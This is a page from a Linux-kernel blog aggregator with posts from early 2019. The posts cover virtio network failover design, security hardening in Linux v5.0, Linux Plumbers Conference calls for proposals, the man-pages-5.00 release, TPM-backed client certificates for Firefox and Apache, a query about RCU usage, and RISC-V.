Non-MAC based pairing

One basic question that had to be addressed early in the design was: how does failover master decide to which slave devices to bind? Unlike bond, failover by design can not rely on the administrator supplying the configuration.

So far, implementations focused on matching MAC addresses as a way to match slave devices. However, some configurations (sometimes called trusted VFs) do not supply VF MAC addresses by the hypervisor.

This seems to call for an alternative mechanism for locating the primary that is not based on the MAC address.

The netvsc driver uses a serial number value to locate the primary device. The serial is typically communicated through the VMBus interface and attached to a para-virtual PCI bus slot created for the device. QEMU/KVM traditionally do not have a para-virtual bus implementation, relying instead of emulating a PCI bus for VMs. One possible approach for QEMU would be to attach an ID value to a PCI slot, or bridge. For example, an ACPI Slot Unique Number, the PCI Physical Slot Number register, or an alternative vendor-specific ID register could be fit for this purpose. The ID could be supplied to the VM guest through the Virtio device. Failover driver would locate the slot based on the ID, and bind to any device located behind the slot. It would then program the MAC address from the standby device into the primary device.

An early implementation of this idea has been posted on the QEMU mailing list, however no patches to the failover driver have been posted yet.

Host network topology and other optimizations

In some configurations it might be better for the guest to use the PV interface in preference to the passthrough one. For example, if the PCI bus is very busy, and there’s spare CPU capacity on the host, it might be faster to send a packet that is destined to another VM on the same host through the hypervisor, bypassing the PCI bus.

This seems to call for keeping both interfaces active at all times. Supporting such an optimization would need to address the possibility of VM migration as well as the dynamic nature of the CPU/PCI bus available capacity, such that the specific interface used for sending packets to each destination can change at any time.

No patches for such support have been posted as of the time of writing of this article.

Specification status

Definition of the VIRTIO_NET_F_STANDBY has been included in the latest Virtio specification draft virtio-v1.1-csprd01.

Non-Linux/non-KVM support

Besides Linux, which systems could benefit from virtual network device failover support?

The DPDK set of userspace drivers is set to gain this support soon.

Drivers for other operating systems could also benefit from increased performance. One can expect the work on these drivers to start in earnest once the hypervisor support is widely available.

Other virtual devices besides Virtio could implement failover. netvsc already has a 2-device implementation that does not rely on the net_failover driver. It is possible that xen-netfront or vmxnet devices could use the failover driver. The author is not familiar with these devices.

Summary

A straight-forward sounding idea of improving performance for a Virtio network device by allowing networking traffic for the VM to temporary travel over a pass-through device exposed a wealth of issues on both VM host and guest sides.

Acknowledgements

The author thanks Jens Freimann for help analyzing netvsc as well as proof-reading the draft and suggesting corrections. The author thanks multiple contibutors who worked on implementation and helped review and guide the feature design over time.

March 17, 2019 05:22 AM

March 12, 2019

Kees Cook: security things in Linux v5.0

Previously: v4.20.

Linux kernel v5.0 was released last week! Looking through the changes, here are some security-related things I found interesting:

read-only linear mapping, arm64
While x86 has had a read-only linear mapping (or “Low Kernel Mapping” as shown in /sys/kernel/debug/page_tables/kernel under CONFIG_X86_PTDUMP=y) for a while, Ard Biesheuvel has added them to arm64 now. This means that ranges in the linear mapping that contain executable code (e.g. modules, JIT, etc), are not directly writable any more by attackers. On arm64, this is visible as “Linear mapping” in /sys/kernel/debug/kernel_page_tables under CONFIG_ARM64_PTDUMP=y, where you can now see the page-level granularity:

---[ Linear mapping ]---
...
0xffffb07cfc402000-0xffffb07cfc403000    4K PTE   ro NX SHD AF NG    UXN MEM/NORMAL
0xffffb07cfc403000-0xffffb07cfc4d0000  820K PTE   RW NX SHD AF NG    UXN MEM/NORMAL
0xffffb07cfc4d0000-0xffffb07cfc4d1000    4K PTE   ro NX SHD AF NG    UXN MEM/NORMAL
0xffffb07cfc4d1000-0xffffb07cfc79d000 2864K PTE   RW NX SHD AF NG    UXN MEM/NORMAL

per-task stack canary, arm
ARM has supported stack buffer overflow protection for a long time (currently via the compiler’s -fstack-protector-strong option). However, on ARM, the compiler uses a global variable for comparing the canary value, __stack_chk_guard. This meant that everywhere in the kernel needed to use the same canary value. If an attacker could expose a canary value in one task, it could be spoofed during a buffer overflow in another task. On x86, the canary is in Thread Local Storage (TLS, defined as %gs:20 on 32-bit and %gs:40 on 64-bit), which means it’s possible to have a different canary for every task since the %gs segment points to per-task structures. To solve this for ARM, Ard Biesheuvel built a GCC plugin to replace the global canary checking code with a per-task relative reference to a new canary in struct thread_info. As he describes in his blog post, the plugin results in replacing:

8010fad8:       e30c4488        movw    r4, #50312      ; 0xc488
8010fadc:       e34840d0        movt    r4, #32976      ; 0x80d0
...
8010fb1c:       e51b2030        ldr     r2, [fp, #-48]  ; 0xffffffd0
8010fb20:       e5943000        ldr     r3, [r4]
8010fb24:       e1520003        cmp     r2, r3
8010fb28:       1a000020        bne     8010fbb0
...
8010fbb0:       eb006738        bl      80129898 <__stack_chk_fail>

with:

8010fc18:       e1a0300d        mov     r3, sp
8010fc1c:       e3c34d7f        bic     r4, r3, #8128   ; 0x1fc0
...
8010fc60:       e51b2030        ldr     r2, [fp, #-48]  ; 0xffffffd0
8010fc64:       e5943018        ldr     r3, [r4, #24]
8010fc68:       e1520003        cmp     r2, r3
8010fc6c:       1a000020        bne     8010fcf4
...
8010fcf4:       eb006757        bl      80129a58 <__stack_chk_fail>

r2 holds the canary saved on the stack and r3 the known-good canary to check against. In the former, r3 is loaded through r4 at a fixed address (0x80d0c488, which “readelf -s vmlinux” confirms is the global __stack_chk_guard). In the latter, it’s coming from offset 0x24 in struct thread_info (which “pahole -C thread_info vmlinux” confirms is the “stack_canary” field).

per-task stack canary, arm64
The lack of per-task canary existed on arm64 too. Ard Biesheuvel solved this differently by coordinating with GCC developer Ramana Radhakrishnan to add support for a register-based offset option (specifically “-mstack-protector-guard=sysreg -mstack-protector-guard-reg=sp_el0 -mstack-protector-guard-offset=...“). With this feature, the canary can be found relative to sp_el0, since that register holds the pointer to the struct task_struct, which contains the canary. I’m hoping there will be a workable Clang solution soon too (for this and 32-bit ARM). (And it’s also worth noting that, unfortunately, this support isn’t yet in a released version of GCC. It’s expected for 9.0, likely this coming May.)

top-byte-ignore, arm64
Andrey Konovalov has been laying the groundwork with his Top Byte Ignore (TBI) series which will also help support ARMv8.3’s Pointer Authentication (PAC) and ARMv8.5’s Memory Tagging (MTE). While TBI technically conflicts with PAC, both rely on using “non-VA-space” (Virtual Address) bits in memory addresses, and getting the kernel ready to deal with ignoring non-VA bits. PAC stores signatures for checking things like return addresses on the stack or stored function pointers on heap, both to stop overwrites of control flow information. MTE stores a “tag” (or, depending on your dialect, a “color” or “version”) to mark separate memory allocation regions to stop use-after-tree and linear overflows. For either of these to work, the CPU has to be put into some form of the TBI addressing mode (though for MTE, it’ll be a “check the tag” mode), otherwise the addresses would resolve into totally the wrong place in memory. Even without PAC and MTE, this byte can be used to store bits that can be checked by software (which is what the rest of Andrey’s series does: adding this logic to speed up KASan).

ongoing: implicit fall-through removal
An area of active work in the kernel is the removal of all implicit fall-through in switch statements. While the C language has a statement to indicate the end of a switch case (“break“), it doesn’t have a statement to indicate that execution should fall through to the next case statement (just the lack of a “break” is used to indicate it should fall through — but this is not always the case), and such “implicit fall-through” may lead to bugs. Gustavo Silva has been the driving force behind fixing these since at least v4.14, with well over 300 patches on the topic alone (and over 20 missing break statements found and fixed as a result of the work). The goal is to be able to add -Wimplicit-fallthrough to the build so that the kernel will stay entirely free of this class of bug going forward. From roughly 2300 warnings, the kernel is now down to about 200. It’s also worth noting that with Stephen Rothwell’s help, this bug has been kept out of linux-next by him sending warning emails to any tree maintainers where a new instance is introduced (for example, here’s a bug introduced on Feb 20th and fixed on Feb 21st).

ongoing: refcount_t conversions
There also continues to be work converting reference counters from atomic_t to refcount_t so they can gain overflow protections. There have been 18 more conversions since v4.15 from Elena Reshetova, Trond Myklebust, Kirill Tkhai, Eric Biggers, and Björn Töpel. While there are more complex cases, the minimum goal is to reduce the Coccinelle warnings from scripts/coccinelle/api/atomic_as_refcounter.cocci to zero. As of v5.0, there are 131 warnings, with the bulk of the remaining areas in fs/ (49), drivers/ (41), and kernel/ (21).

userspace PAC, arm64
Mark Rutland and Kristina Martsenko enabled kernel support for ARMv8.3 PAC in userspace. As mentioned earlier about PAC, this will give userspace the ability to block a wide variety of function pointer overwrites by “signing” function pointers before storing them to memory. The kernel manages the keys (i.e. selects random keys and sets them up), but it’s up to userspace to detect and use the new CPU instructions. The “paca” and “pacg” flags will be visible in /proc/cpuinfo for CPUs that support it.

platform keyring
Nayna Jain introduced the trusted platform keyring, which cannot be updated by userspace. This can be used to verify platform or boot-time things like firmware, initramfs, or kexec kernel signatures, etc.

Edit: added userspace PAC and platform keyring, suggested by Alexander Popov
Edit: tried to clarify TBI vs PAC vs MTE

That’s it for now; please let me know if I missed anything. The v5.1 merge window is open, so off we go! :)

© 2019, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.
Creative Commons License

March 12, 2019 11:04 PM

Linux Plumbers Conference: Linux Plumbers Conference 2019 Call for Refereed-Track Proposals

We are pleased to announce the Call for Refereed-Track talk proposals for the 2019 edition of the Linux Plumbers Conference, which will be held in Lisbon, Portugal on September 9-11 in conjunction with the Linux Kernel Maintainer Summit.

Refereed track presentations are 50 minutes in length (which includes time for questions and discussion) and should focus on a specific aspect of the “plumbing” in the Linux system. Examples of Linux plumbing include core kernel subsystems, toolchains, container runtimes, core libraries, windowing systems, management tools, device support, media creation/playback, and so on. The best presentations are not about finished work, but rather problems, proposals, or proof-of-concept solutions that require face-to-face discussions and debate.

For more information on submitting a Refereed-Track talk proposal, see the following:

https://www.linuxplumbersconf.org/event/4/abstracts

Please note that the submission system is the same as 2018. If you created an user account last year, you will be able to re-use the same credentials to submit and modify your proposal(s) this year.

The call for Microconferences proposals is also open, and we hope to see you in Lisbon this coming September!

March 12, 2019 04:22 PM

Linux Plumbers Conference: Linux Plumbers Conference 2019 Call for Microconference Proposals

We are pleased to announce the Call for Microconferences for the 2019 edition of the Linux Plumbers Conference, which will be held in Lisbon, Portugal on September 9-11 in conjunction with the Linux Kernel Maintainer Summit.

A microconference is a collection of collaborative sessions focused on problems in a particular area of the Linux plumbing, which includes the kernel, libraries, utilities, services, UI, and so forth, but can also focus on cross-cutting concerns such as security, scaling, energy efficiency, toolchains, container runtimes, or a particular use case. Good microconferences result in solutions to these problems and concerns, while the best microconferences result in patches that implement those solutions. For more information on submitting a microconference proposal, see the following:

https://www.linuxplumbersconf.org/event/4/abstracts

Please note that the submission system is the same as 2018. If you created an user account last year, you will be able to re-use the same credentials to submit and modify your proposal(s) this year.

Look for the upcoming call for refereed-track proposals, and we hope to see you in Lisbon this coming September!

March 12, 2019 12:07 AM

March 07, 2019

Michael Kerrisk (manpages): man-pages-5.00 is released

I've released man-pages-5.00. The release tarball is available on kernel.org. The browsable online pages can be found on man7.org. The Git repository for man-pages is available on kernel.org.

This release resulted from patches, bug reports, reviews, and comments from around 130 contributors. The release is rather larger than average, since it has been nearly a year since the last release. The release includes more than 600 commits that changed nearly 400 pages. In addition, 3 new manual pages were added.

Among the more significant changes in man-pages-5.,00 are the following:

In addition, two pages have been removed in this release after encouragement from Ingo Schwarze: mdoc(7) and mdoc.samples(7). As the commit message notes, groff_mdoc(7) from the groff project provides a better equivalent of mdoc.samples(7) and the mandoc project provides a better mdoc(7). And nowadays, there are virtually no pages in man-pages that use mdoc markup.

Again special thanks to Eugene Syromyatnikov, who contributed nearly 30 patches to this release!

March 07, 2019 04:57 AM

March 06, 2019

James Bottomley: Using TPM Based Client Certificates on Firefox and Apache

One of the useful features of Apache (or indeed any competent web server) is the ability to use client side certificates. All this means is that a certificate from each end of the TLS transaction is verified: the browser verifies the website certificate, but the website requires the client also to present one and verifies it. Using client certificates, when linked to your own client certificate CA gives web transactions the strength of two factor authentication if you do it on the login page. I use this feature quite a lot for all the admin features my own website does. With apache it’s really simple to turn on with the

SSLCACertificateFile

Directive which allows you to specify the CA for the accepted certificates. In my own setup I have my own self signed certificate as CA and then all the authority certificates use it as the issuer. You can turn Client Certificate verification on per location basis simply by doing

<Location /some/web/location>
SSLVerifyClient require
</Location

And Apache will take care of requesting the client certificate and verifying it against the CA. The only caveat here is that TLSv1.3 currently fails to work for this, so you have to disable it with

SSLProtocol -TLSv1.3

Client Certificates in Firefox

Firefox is somewhat hard to handle for SSL because it includes its own hand written mozilla secure sockets code, which has a toolkit quite unlike any other ssl toolkit1. In order to import a client certificate and key into firefox, you need to create a pkcs12 file containing them and import that into the “Your Certificates” box which is under Preferences > Privacy & Security > View Certificates

Obviously, simply supplying a key file to firefox presents security issues because you’d like to prevent a clever hacker from gaining access to it and thus running off with your client certificate. Firefox achieves a modicum of security by doing all key operations over the PKCS#11 API via a software token, which should mean that even malicious javascript cannot gain access to your key but merely the signing API

However, assuming you don’t quite trust this software separation, you need to store your client signing key in a secure vault like a TPM to make sure no web hacker can gain access to it. Various crypto system connectors, like the OpenSSL TPM2 and TPM2 engine, already exist but because Firefox uses its own crytographic code it can’t take advantage of them. In fact, the only external object the Firefox crypto code can use is a PKCS#11 module.

Aside about TPM2 and PKCS#11

The design of PKCS#11 is that it is a loadable library which can find and enumerate keys and certificates in some type of hardware device like a USB Key or a PCI attached HSM. However, since the connector is simply a library, nothing requires it connect to something physical and the OpenDNSSEC project actually produces a purely software based cryptographic token. In theory, then, it should be easy

The problems come with the PKCS#11 expectation of key residency: The library allows the consuming program to enumerate a list of slots each of which may, or may not, be occupied by a single token. Each token may contain one or more keys and certificates. Now the TPM does have a concept of a key resident in NV memory, which is directly analagous to the PKCS#11 concept of a token based key. The problems start with the TPM2 PC Client Profile which recommends this NV area be about 512 bytes, which is big enough for all of one key and thus not very scalable. In fact, the imagined use case of the TPM is with volatile keys which are demand loaded.

Demand loaded keys map very nicely to the OpenSSL idea of a key file, which is why OpenSSL TPM engines are very easy to understand and use, but they don’t map at all into the concept of token resident keys. The closest interface PKCS#11 has for handling key files is the provisioning calls, but even there they’re designed for placing keys inside tokens and, once provisioned, the keys are expected to be non-volatile. Worse still, very few PKCS#11 module consumers actually do provisioning, they mostly leave it up to a separate binary they expect the token producer to supply.

Even if the demand loading problem could be solved, the PKCS#11 API requires quite a bit of additional information about keys, like ids, serial numbers and labels that aren’t present in the standard OpenSSL key files and have to be supplied somehow.

Solving the Key File to PKCS#11 Mismatch

The solution seems reasonably simple: build a standard PKCS#11 library that is driven by a known configuration file. This configuration file can map keys to slots, as required by PKCS#11, and also supply all the missing information. the C_Login() operation is expected to supply a passphrase (or PIN in PKCS#11 speak) so that would be the point at which the private key could be loaded.

One of the interesting features of the above is that, while it could be implemented for the TPM engine only, it can also be implemented as a generic OpenSSL key exporter to PKCS#11 that happens also to take engine keys. That would mean it would work for non-engine keys as well as any engine that exists for OpenSSL … a nice little win.

Building an OpenSSL PKCS#11 Key Exporter

A Token can be built from a very simple ini like configuration file, with the global section setting global properties, like manufacurer id and library description and each individual section being used to instantiate a slot containing one key. We can make the slot name, the id and the label the same if not overridden and use key file directives to load the public and private keys. The serial number seems best constructed from a hash of the public key parameters (again, if not overridden). In order to support engine keys, the token library needs to know which engine to invoke, so I added an engine keyword to tell it.

With that, the mechanics of making the token library work with any OpenSSL key are set, the only thing is to plumb in the PKCS#11 glue API. At this point, I should add that the goal is simply to get keys and tokens working, not to replicate a full featured PKCS#11 API, so you shouldn’t use this as something to test against for a reference implementation (the softhsm2 token is much better for that). However, it should be functional enough to use for storing keys in Firefox (as well as other things, see below).

The current reasonably full featured source code is here, with a reference build using the OpenSUSE Build Service here. I should add that some of the build failures are due to problems with p11-kit and others due to the way Debian gets the wrong engine path for libp11.

At Last: Getting TPM Keys working with Firefox

A final problem with Firefox is that there seems to be no way to import a certificate file for which the private key is located on a token. The only way Firefox seems to support this is if the token contains both the private key and the certificate. At least this is my own project, so some coding later, the token now supports certificates as well.

The next problem is more mundane: generating the certificate and key. Obviously, the safest key is one which has never left the TPM, which means the certificate request needs to be built from it. I chose a CSR type that also includes my name and my machine name for later easy discrimination (and revocation if I ever lose my laptop). This is the sequence of commands for my machine called jarvis.

create_tpm2_key -a key.tpm
openssl req -subj "/CN=James Bottomley/UID=jarivs/" -new -engine tpm2 -keyform engine -key key.tpm -nodes -out jarvis.csr
openssl x509 -in jarvis.csr -req -CA my-ca.crt -engine tpm2 -CAkeyform engine -CAkey my-ca.key -days 3650 -out jarvis.crt

As you can see from the above, the key is first created by the TPM, then that key is used to create a certificate request where the common name is my name and the UID is the machine name (this is just my convention, feel free to use your own) and then finally it’s signed by my own CA, which you’ll notice is also based on a TPM key. Once I have this, I’m free to create an ini file to export it as a token to Firefox

manufacturer id = Firefox Client Cert
library description = Cert for hansen partnership
[mozilla-key]
certificate = /home/jejb/jarvis.crt
private key = /home/jejb/key.tpm
engine = tpm2

All I now need to do is load the PKCS#11 shared object library into Firefox using Settings > Privacy & Security > Security Devices > Load and I have a TPM based client certificate ready for use.

Additional Uses

It turns out once you have a generic PKCS#11 exporter for engine keys, there’s no end of uses for them. One of the most convenient has been using TPM2 keys with gnutls. Although gnutls was quick to adopt TPM 1.2 based keys, it’s been much slower with TPM2 but because gnutls already has a PKCS#11 interface using the p11 kit URI format, you can easily build a config file of all the TPM2 keys you want it to use and simply use them by URI in gnutls.

Unfortunately, this has also lead to some problems, the biggest one being Firefox: Firefox assumes, once you load a PKCS#11 module library, that you want it to use every single key it can find, which is fine until it pops up 10 dialogue boxes each time you start it, one for each key password, particularly if there’s only one key you actually care about it using. This problem doesn’t seem solvable in the Firefox token interface, so the eventual way I did it was to add the ability to specify the config file in the environment (variable OPENSSL_PKCS11_CONF) and modify my xfce Firefox action to set this in the environment pointing at a special configuration file with only Firefox’s key in it.

Conclusions and Future Work

Hopefully I’ve demonstrated this simple PKCS#11 converter can be useful both to keeping Firefox keys safe as well as uses in other things like gnutls. Unfortunately, it turns out that the world wide web is turning against PKCS#11 tokens as having usability problems and is moving on to something called FIDO2 tokens which have the web browser talking directly to the USB token. In my next technical post I hope to explain how you can use the Linux Kernel USB gadget system to connect a TPM up easily as a FIDO2 token so you can use the new passwordless webauthn protocol seamlessly.

March 06, 2019 08:21 PM

March 05, 2019

Paul E. Mc Kenney: Parallel Programming: March 2018 deferred-processing query

TL;DR: Do you know of additional publicly visible production uses of sequnce locking, hazard pointers, or RCU not already called out in the remainder of this blog post?

I am updating the deferred-processing chapter of “Is Parallel Programming Hard, And, If So, What Can You Do About It?” and would like to include a list of publicly visible production uses of sequence locking, hazard pointers, and RCU. I suppose I could also include reference counting, but given that it was well known before I was born, I expect that its list would be way too long to be useful!

The only production use of sequence locking that I am aware of is within the Linux kernel, but I would be surprised if it is not rather widely used. Can you tell me of more publicly visible production sequence-locking uses?

Hazard pointers is used within MongoDB (v3.0 and later) and within Facebook's Folly library, which is used in production at Facebook and perhaps elsewhere as well. It is also implemented by several libraries called out on its Wikipedia page (Concurrent Building Blocks, Concurrency Kit, Atomic Ptr Plus, and libcds). Hazard pointers is also sometimes called “safe memory reclamation” (SMR). Any other production hazard-pointers uses?

RCU is used within the Linux kernel, the FreeBSD kernel, the OpenBSD kernel, Linux Trace Toolkit Next Generation (LTTng), QEMU, Knot DNS, Netsniff-ng, Sheepdog, GlusterFS, and gdnsd. It is also implemented by several libraries, including Userspace RCU, Concurrency Kit, Facebook's Folly library, and libcds. RCU is also called “epochs” (from Keir Fraser), “generations” (from Tornado/K42), “passive serialization” (from IBM zVM), and probably other things as well. Any other production RCU uses?

So what do I mean by “publicly visible”? Open-source projects should qualify, as should scholarly publications regarding proprietary projects. Similarly, “production use” means use for getting some job done, as opposed to research, prototyping, or benchmarking. Not that there is necessarily anything wrong with research, prototyping, or benchmarking, but we are looking for things a little bit further along the hype cycle. ;-)

March 05, 2019 06:45 PM

February 28, 2019

Pete Zaitcev: Suddenly RISC-V

I knew about that thing because Rich Jones was a fan. Man, that guy is always ahead of the curve.

Coincidentially, a couple of days ago Amazon announced support for RISC-V in FreeRTOS (I have no idea how free that thig is. It's MIT license, but with Amazon, it might be patented up the gills.).

February 28, 2019 07:51 PM